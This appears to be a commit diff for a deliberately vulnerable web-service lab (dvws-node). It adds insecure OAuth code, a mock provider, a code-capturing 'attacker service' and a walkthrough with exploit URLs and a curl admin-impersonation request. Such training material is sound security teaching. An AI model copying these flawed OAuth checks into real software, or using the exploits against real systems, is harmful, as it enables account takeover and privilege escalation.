snoopysecurity
diff --git a/‎README.md‎
Lines changed: 10 additions & 4 deletions b/‎README.md‎
Lines changed: 10 additions & 4 deletions
diff --git a/‎answers.md‎
Lines changed: 94 additions & 0 deletions b/‎answers.md‎
Lines changed: 94 additions & 0 deletions
diff --git a/‎attacker-service/Dockerfile‎
Lines changed: 7 additions & 0 deletions b/‎attacker-service/Dockerfile‎
Lines changed: 7 additions & 0 deletions
diff --git a/‎attacker-service/app.js‎
Lines changed: 39 additions & 0 deletions b/‎attacker-service/app.js‎
Lines changed: 39 additions & 0 deletions
diff --git a/‎attacker-service/package.json‎
Lines changed: 9 additions & 0 deletions b/‎attacker-service/package.json‎
Lines changed: 9 additions & 0 deletions
diff --git a/‎controllers/users.js‎
Lines changed: 154 additions & 0 deletions b/‎controllers/users.js‎
Lines changed: 154 additions & 0 deletions
diff --git a/‎docker-compose.yml‎
Lines changed: 10 additions & 0 deletions b/‎docker-compose.yml‎
Lines changed: 10 additions & 0 deletions
diff --git a/‎oauth-provider/Dockerfile‎
Lines changed: 7 additions & 0 deletions b/‎oauth-provider/Dockerfile‎
Lines changed: 7 additions & 0 deletions
@@ -118,13 +118,19 @@ Change directory to dvws-node
 cd dvws-node
 ```
 Start Docker
+```bash
+docker-compose up --build
 ```
-`docker-compose up`
-```
-This will start the dvws service with the backend MySQL database and the NoSQL database.
+This will start the dvws service with the backend MySQL database and the NoSQL database. It will also start:
+*   **OAuth Provider (Port 5000):** A mock Identity Provider for testing OAuth flows.
+*   **Attacker Service (Port 6666):** A service to capture callbacks and tokens.
 
 If the DVWS web service doesn't start because of delayed MongoDB or MySQL setup, then increase the value of environment variable : `WAIT_HOSTS_TIMEOUT`
 
+## OAuth Vulnerabilities
+We have added support for testing OAuth vulnerabilities (Account Takeover, CSRF, Token Leakage).
+See [answers.md](answers.md) for a detailed guide on how to exploit these flaws using the provided services.
+
 
 
 ## Solutions
@@ -141,7 +147,7 @@ If the DVWS web service doesn't start because of delayed MongoDB or MySQL setup,
 * GraphQL Injection
 * Webhook security
 * Parameter Pollution
-* OAuth2/OIDC Flow Flaws
+* OpenID Connect (OIDC) issues
 
 
 ## Any Questions
 
@@ -0,0 +1,94 @@
+# OAuth Vulnerability Walkthrough
+
+This document describes the OAuth vulnerabilities introduced into the `dvws-node` application and how to exploit them using the provided `oauth-provider` and `attacker-service`.
+
+## 1. Privilege Escalation (Scope Upgrade)
+
+**Vulnerability:**
+The `dvws-node` application determines user privileges based on the OAuth **scopes** granted by the provider. Specifically, if the Access Token contains the `dvws:admin` scope, the user is granted local Administrator rights. The Vulnerability is that the Mock Provider grants *any* scope requested by the client without restriction, and the Client Application trusts the presence of this scope blindly.
+
+**Exploitation:**
+1.  Click **"Login with MockOAuth"**.
+2.  Observe the URL in the address bar when you reach the Login Page. It looks like:
+    `http://localhost:5000/login?return_to=/authorize?client_id=dvws-client&redirect_uri=...&scope=openid`
+3.  **The Attack:** Modify the URL to append the admin scope. Change `scope=openid` to `scope=openid dvws:admin`.
+    *   You might need to URL encode the space (`%20`), so: `scope=openid%20dvws:admin`.
+    *   Or modify the `return_to` parameter if you are already at the login page, but it's easier to modify the `/authorize` link before you get redirected (intercept the request or copy-paste).
+    *   Easier method: 
+        1.  Go to `http://localhost:5000/authorize?client_id=dvws-client&redirect_uri=http://localhost:80/api/v2/auth/callback&response_type=code&scope=openid%20dvws:admin` directly.
+4.  Log in as **ANY** user (e.g., `attacker`). You do *not* need to be `admin`.
+5.  The Provider will grant the requested `dvws:admin` scope.
+6.  You will be redirected back to the app.
+7.  `dvws-node` sees the scope and logs you in as `attacker` but with **Admin Privileges**.
+8.  Verify by checking if you can access Admin features.
+
+## 2. Cross-Site Request Forgery (CSRF)
+
+**Vulnerability:**
+The OAuth flow initiated by `dvws-node` (`/api/v2/login/oauth`) does not generate or validate a `state` parameter. This means an attacker can start a login flow, obtain an authorization code, and then trick a victim into consuming that code, logging the victim into the attacker's account.
+
+**Exploitation:**
+1.  **Attacker Steps:**
+    *   The attacker starts the login flow but stops before the callback is consumed (or manually gets a code from the provider).
+    *   Since the provider is auto-approving, the attacker can just construct the callback URL manually if they know a valid code, OR they can send the victim to the Provider's authorize page with a fixed parameters.
+    *   A more common CSRF in OAuth is "Login CSRF": Attacker logs in to *their* account, captures the authorization code, and stops. Then constructs a link: `http://localhost/api/v2/auth/callback?code=ATTACKER_CODE` (or `http://localhost:80/...`).
+2.  **Victim Steps:**
+    *   Victim clicks the link.
+    *   `dvws-node` consumes `ATTACKER_CODE`.
+    *   `dvws-node` logs the victim in as the user associated with that code (the Attacker).
+    *   The victim is now using the app as the Attacker. If they enter credit card info or private notes, the Attacker can see them.
+
+## 3. Authorization Code Leakage (via Open Redirect on Provider)
+
+**Vulnerability:**
+The Mock OAuth Provider (`oauth-provider`) implements a weak validation of the `redirect_uri` parameter. It checks if the URI contains "localhost", but does not strictly check the port or path.
+
+**Exploitation:**
+1.  Attacker constructs a malicious link:
+    ```
+    http://localhost:5000/authorize?client_id=dvws-client&response_type=code&redirect_uri=http://localhost:6666/callback
+    ```
+    (Note: `localhost:6666` contains "localhost" so it passes the weak check).
+2.  Victim clicks the link (thinking it's a legitimate login to the provider).
+3.  If the victim is logged in to the provider, they are redirected. If not, they log in, and *then* are redirected.
+4.  The Provider redirects the victim to:
+    ```
+    http://localhost:6666/callback?code=SECRET_CODE
+    ```
+4.  The `attacker-service` logs the `SECRET_CODE`.
+5.  The attacker can now exchange this code for an access token (if they can communicate with the provider's `/token` endpoint) or impersonate the user if the client accepts the code (via the CSRF vulnerability above).
+
+## 4. Authentication Bypass via Implicit Flow
+
+**Vulnerability:**
+The application supports a custom login flow where an access token is submitted via a POST request to `/api/v2/login/implicit`. The server verifies that the access token is valid (by checking with the provider), but fails to ensure that the token belongs to the user claimed in the request body. It trusts the `username` parameter submitted by the client as long as the token is valid.
+
+**Exploitation:**
+1.  Log in to the `oauth-provider` as `attacker` (or any user).
+2.  Obtain a valid Access Token by manually initiating an Implicit Flow request:
+    `http://localhost:5000/authorize?client_id=dvws-client&redirect_uri=http://localhost&response_type=token`
+3.  Copy the `access_token` from the URL fragment in the address bar.
+4.  Send a POST request to `http://localhost:80/api/v2/login/implicit`:
+    ```bash
+    curl -X POST http://localhost:80/api/v2/login/implicit \
+      -H "Content-Type: application/json" \
+      -d '{"access_token": "YOUR_ACCESS_TOKEN", "username": "admin"}'
+    ```
+5.  The server validates the token with the provider (it is valid), but logs you in as `admin` (based on your JSON body).
+
+## Supported OAuth Vulnerabilities
+
+The following vulnerabilities from the PortSwigger/Doyensec list are currently supported in this environment:
+
+*   **Flawed CSRF protection:** No `state` parameter is used.
+*   **Leaking authorization codes:** Via Open Redirect on the Provider.
+*   **Flawed redirect_uri validation:** Provider allows `localhost` bypass.
+*   **Flawed scope validation (Scope Upgrade):** Provider allows any scope; Client escalates privileges based on scope.
+*   **Unverified user registration:** Client trusts identity from Provider; Provider allows spoofing (via Login form or Auto-Registration).
+*   **Improper implementation of the implicit grant type:** Client trusts POSTed user identity if token is valid.
+
+## Services Overview
+
+*   **dvws-node (Port 80):** The vulnerable application.
+*   **oauth-provider (Port 5000):** The Mock Identity Provider.
+*   **attacker-service (Port 6666):** Receives leaked codes.
@@ -0,0 +1,7 @@
+FROM node:20-alpine
+WORKDIR /app
+COPY package*.json ./
+RUN npm install
+COPY . .
+CMD ["node", "app.js"]
+EXPOSE 6666
@@ -0,0 +1,39 @@
+const express = require('express');
+const cors = require('cors');
+
+const app = express();
+app.use(cors());
+
+const PORT = 6666;
+
+app.get('/health', (req, res) => {
+    res.json({ status: 'ok' });
+});
+
+app.use((req, res, next) => {
+    console.log(`[Attacker] Incoming ${req.method} request to ${req.url}`);
+    console.log('Headers:', req.headers);
+    console.log('Query:', req.query);
+    next();
+});
+
+app.get('/callback', (req, res) => {
+    res.send(`
+        <h1>Attacker Site</h1>
+        <p>Thanks for the code!</p>
+        <pre>${JSON.stringify(req.query, null, 2)}</pre>
+    `);
+});
+
+app.get('/exploit', (req, res) => {
+    // Basic CSRF exploit template
+    res.send(`
+        <h1>Attacker Exploit Page</h1>
+        <p>Click <a href="http://localhost:9090/api/v2/login/oauth">here</a> to win a prize!</p>
+        <!-- Auto submit script could go here -->
+    `);
+});
+
+app.listen(PORT, '0.0.0.0', () => {
+    console.log(`Attacker Service running on port ${PORT}`);
+});
@@ -0,0 +1,9 @@
+{
+  "name": "dvws-attacker-service",
+  "version": "1.0.0",
+  "main": "app.js",
+  "dependencies": {
+    "express": "^4.19.2",
+    "cors": "^2.8.5"
+  }
+}
@@ -2,6 +2,7 @@ const mongoose = require('mongoose');
 const bcrypt = require('bcrypt');
 const jwt = require('jsonwebtoken');
 const xml2js = require('xml2js');
+const needle = require('needle');
 
 const connUri = process.env.MONGO_LOCAL_CONN_URL;
 const User = require('../models/users');
@@ -375,5 +376,158 @@ module.exports = {
         filter: filter, // Reflect filter for educational/debugging
         results: results 
     });
+  },
+
+  // Vulnerability: OAuth Insecure Implementation
+  oauthLogin: (req, res) => {
+      // Scenario: User clicks "Login with MockOAuth".
+      // Vulnerability: Missing 'state' parameter or predictable state allows CSRF.
+      
+      const clientId = "dvws-client";
+      // This should be dynamic based on host, but hardcoded for now
+      // The main app runs on port 80
+      const redirectUri = "http://localhost:80/api/v2/auth/callback";
+      
+      // Vulnerability: No state parameter used
+      // For client-side redirect, we must use localhost since the browser cannot resolve docker service names
+      const authUrl = `http://localhost:5000/authorize?client_id=${clientId}&redirect_uri=${redirectUri}&response_type=code&scope=openid`;
+      
+      res.redirect(authUrl);
+  },
+
+  oauthCallback: async (req, res) => {
+      const code = req.query.code;
+      if (!code) return res.status(400).send("No code returned");
+
+      // Vulnerability: No state validation here either.
+
+      // We use internal docker URL for back-channel communication
+      const providerUrl = process.env.OAUTH_PROVIDER_URL || 'http://oauth-provider:5000';
+      const clientId = "dvws-client";
+      const redirectUri = "http://localhost:80/api/v2/auth/callback";
+
+      try {
+          // Exchange code for token
+          const tokenResp = await needle('post', `${providerUrl}/token`, {
+              code,
+              client_id: clientId,
+              client_secret: "secret", // Mock doesn't care
+              grant_type: "authorization_code",
+              redirect_uri: redirectUri
+          }, { json: true });
+
+          if (tokenResp.statusCode !== 200) {
+              return res.status(500).send("Failed to get token from provider: " + JSON.stringify(tokenResp.body));
+          }
+
+          const accessToken = tokenResp.body.access_token;
+          const grantedScope = tokenResp.body.scope || "";
+          
+          // Get User Info
+          const userResp = await needle('get', `${providerUrl}/userinfo`, null, {
+              headers: { Authorization: `Bearer ${accessToken}` }
+          });
+
+          if (userResp.statusCode !== 200) {
+              return res.status(500).send("Failed to get user info");
+          }
+
+          const profile = userResp.body;
+          // Vulnerability: Trusting the 'preferred_username'
+          const username = profile.preferred_username;
+
+          let user = await User.findOne({ username });
+          
+          // Auto-register if not found (simulates open registration)
+          if (!user) {
+              try {
+                  user = new User({ 
+                      username: username, 
+                      password: "oauth-generated-password", 
+                      admin: false 
+                  });
+                  await user.save();
+              } catch (e) {
+                  return res.status(500).send("Error creating user: " + e.message);
+              }
+          }
+          
+          if (user) {
+              // Vulnerability: Privilege Escalation via Scope
+              // If the token has 'dvws:admin' scope, we grant admin privileges regardless of the user's DB status.
+              const isAdmin = grantedScope.includes("dvws:admin") || user.admin;
+
+              // Log them in!
+              const payload = { 
+                  user: user.username,
+                  permissions: isAdmin ? ["user:read", "user:write", "user:admin"] : ["user:read", "user:write"]
+              };
+              const options = { expiresIn: '2d', issuer: 'https://github.com/snoopysecurity', algorithm: "HS256"};
+              const secret = process.env.JWT_SECRET;
+              const token = jwt.sign(payload, secret, options);
+              
+              res.send(`
+                  <html><body>
+                  <p>Login successful! Redirecting...</p>
+                  <script>
+                      localStorage.setItem('JWTSessionID', '${token}');
+                      window.location.href = '/home.html#${user.username}';
+                  </script>
+                  </body></html>
+              `);
+          } else {
+              res.status(404).send(`User '${username}' not found in local DB. (Mock IdP returned: ${JSON.stringify(profile)})`);
+          }
+
+      } catch (err) {
+          console.error(err);
+          res.status(500).send(err.message);
+      }
+  },
+
+  // Vulnerability: Improper Implicit Flow Implementation
+  implicitLogin: async (req, res) => {
+      const { access_token, username } = req.body;
+      
+      // We use internal docker URL for back-channel communication
+      const providerUrl = process.env.OAUTH_PROVIDER_URL || 'http://oauth-provider:5000';
+
+      try {
+          // Verify token (Validating the token is "good")
+          const userResp = await needle('get', `${providerUrl}/userinfo`, null, {
+              headers: { Authorization: `Bearer ${access_token}` }
+          });
+
+          if (userResp.statusCode !== 200) {
+              return res.status(401).send("Invalid access token");
+          }
+
+          // FLAW: We ignore the user info from the provider and trust the username passed in the body!
+          
+          let user = await User.findOne({ username });
+          
+          if (user) {
+              // Log them in!
+              const payload = { 
+                  user: user.username,
+                  permissions: user.admin ? ["user:read", "user:write", "user:admin"] : ["user:read", "user:write"]
+              };
+              const options = { expiresIn: '2d', issuer: 'https://github.com/snoopysecurity', algorithm: "HS256"};
+              const secret = process.env.JWT_SECRET;
+              const token = jwt.sign(payload, secret, options);
+              
+              res.json({
+                  success: true,
+                  token: token,
+                  username: user.username
+              });
+          } else {
+              res.status(404).send(`User '${username}' not found.`);
+          }
+
+      } catch (err) {
+          console.error(err);
+          res.status(500).send(err.message);
+      }
   }
 };
@@ -19,6 +19,16 @@ services:
             WAIT_HOSTS_TIMEOUT: 160
             SQL_LOCAL_CONN_URL: dvws-mysql
             MONGO_LOCAL_CONN_URL: mongodb://dvws-mongo:27017/node-dvws
+            OAUTH_PROVIDER_URL: http://oauth-provider:5000
         depends_on:
             - dvws-mongo
             - dvws-mysql
+            - oauth-provider
+    oauth-provider:
+        build: ./oauth-provider
+        ports:
+            - "5000:5000"
+    attacker-service:
+        build: ./attacker-service
+        ports:
+            - "6666:6666"
@@ -0,0 +1,7 @@
+FROM node:20-alpine
+WORKDIR /app
+COPY package*.json ./
+RUN npm install
+COPY . .
+CMD ["node", "app.js"]
+EXPOSE 5000